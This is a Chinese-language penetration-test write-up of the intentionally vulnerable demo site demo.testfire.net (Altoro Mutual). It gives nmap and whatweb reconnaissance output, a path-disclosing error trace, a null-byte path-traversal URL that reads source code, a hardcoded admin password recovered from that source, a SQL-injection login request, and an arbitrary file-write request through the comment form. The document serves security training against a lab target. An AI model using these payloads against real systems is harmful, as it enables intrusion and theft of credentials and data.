demo.testfire.net
信息搜集
域名
IP 端口信息
65.61.137.117
1
1
65.61.137.117
2
nmap 信息
root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A 65.61.137.117 Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT Nmap scan report for 65.61.137.117 Host is up (0.60s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.0 | http-cookie-flags: | /: | amSessionId: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.0 |_http-title: Altoro Mutual 443/tcp open ssl/http Microsoft IIS httpd 8.0 | http-cookie-flags: | /: | amSessionId: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.0 |_http-title: Altoro Mutual | ssl-cert: Subject: commonName=demo.testfire.net | Not valid before: 2014-07-01T09:54:37 |_Not valid after: 2019-12-22T09:54:37 |_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time. 445/tcp filtered microsoft-ds 514/tcp filtered shell 4444/tcp filtered krb524 Device type: general purpose Running: Microsoft Windows XP|7|2012 OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 5.10 ms 192.168.245.2 2 26.32 ms 65.61.137.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds
x
1
root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A 65.61.137.117
2
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT
3
Nmap scan report for 65.61.137.117
4
Host is up (0.60s latency).
5
Not shown: 995 closed ports
6
PORT STATE SERVICE VERSION
7
80/tcp open http Microsoft IIS httpd 8.0
8
| http-cookie-flags:
9
| /:
10
| amSessionId:
11
|_ httponly flag not set
12
| http-methods:
13
|_ Potentially risky methods: TRACE
14
|_http-server-header: Microsoft-IIS/8.0
15
|_http-title: Altoro Mutual
16
443/tcp open ssl/http Microsoft IIS httpd 8.0
17
| http-cookie-flags:
18
| /:
19
| amSessionId:
20
|_ httponly flag not set
21
| http-methods:
22
|_ Potentially risky methods: TRACE
23
|_http-server-header: Microsoft-IIS/8.0
24
|_http-title: Altoro Mutual
25
| ssl-cert: Subject: commonName=demo.testfire.net
26
| Not valid before: 2014-07-01T09:54:37
27
|_Not valid after: 2019-12-22T09:54:37
28
|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.
29
445/tcp filtered microsoft-ds
30
514/tcp filtered shell
31
4444/tcp filtered krb524
32
Device type: general purpose
33
Running: Microsoft Windows XP|7|2012
34
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
35
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
36
Network Distance: 2 hops
37
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
38
39
Host script results:
40
|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s
41
42
TRACEROUTE (using port 1723/tcp)
43
HOP RTT ADDRESS
44
1 5.10 ms 192.168.245.2
45
2 26.32 ms 65.61.137.117
46
47
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
48
Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds
49
中间件
root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/ http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]
x
1
root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/
2
http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]
总结
- windows 服务器 , asp.net (aspx) . iis8
- 靶机网站, 域名, cdn 等信息无需搜集
漏洞挖掘
错误日志,泄露物理路径
GET 请求访问
http://demo.testfire.net/comment.aspx
1
An Error Has Occurred
2
Summary:
3
Value cannot be null.
4
5
Error Message:
6
System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
疑似程序路径
c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31
x
1
c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31
登录处无验证码 ( maybe 暴力破解)
x
1
http://www.altoromutual.com/bank/login.aspx
任意文件内容读取
查看
login.aspx 的源代码
x
1
http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt
给出不存在的文件会报出目录信息
Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,' System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'. File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,' at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options) at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize) at System.IO.StreamReader..ctor(String path) at System.IO.File.OpenText(String path) at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42 at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
1
Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
2
System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.
3
File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
4
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
5
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
6
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
7
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
8
at System.IO.StreamReader..ctor(String path)
9
at System.IO.File.OpenText(String path)
10
at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42
11
at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70
12
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
13
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
14
at System.Web.UI.Control.OnLoad(EventArgs e)
15
at System.Web.UI.Control.LoadRecursive()
16
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
读取
/admin/login.aspx 的源码 拿到 管理员的密码
if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")
x
1
if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")
SQL 注入
POST /bank/login.aspx HTTP/1.1 Host: demo.testfire.net Content-Length: 45 Cache-Control: max-age=0 Origin: http://demo.testfire.net Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288 Connection: close uid=hac425%27&passw=%27%27%27&btnSubmit=Login
1
POST /bank/login.aspx HTTP/1.1
2
Host: demo.testfire.net
3
Content-Length: 45
4
Cache-Control: max-age=0
5
Origin: http://demo.testfire.net
6
Upgrade-Insecure-Requests: 1
7
Content-Type: application/x-www-form-urlencoded
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
10
Referer: http://demo.testfire.net/bank/login.aspx
11
Accept-Encoding: gzip, deflate
12
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
13
Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288
14
Connection: close
15
16
uid=hac425%27&passw=%27%27%27&btnSubmit=Login
写文件
貌似只能写
txt , 写
aspx 访问不了
POST /comment.aspx HTTP/1.1 Host: www.altoromutual.com Content-Length: 111 Cache-Control: max-age=0 Origin: http://www.altoromutual.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://www.altoromutual.com/feedback.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004 Connection: close cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+
x
1
POST /comment.aspx HTTP/1.1
2
Host: www.altoromutual.com
3
Content-Length: 111
4
Cache-Control: max-age=0
5
Origin: http://www.altoromutual.com
6
Upgrade-Insecure-Requests: 1
7
Content-Type: application/x-www-form-urlencoded
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
10
Referer: http://www.altoromutual.com/feedback.aspx
11
Accept-Encoding: gzip, deflate
12
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
13
Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004
14
Connection: close
15
16
cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+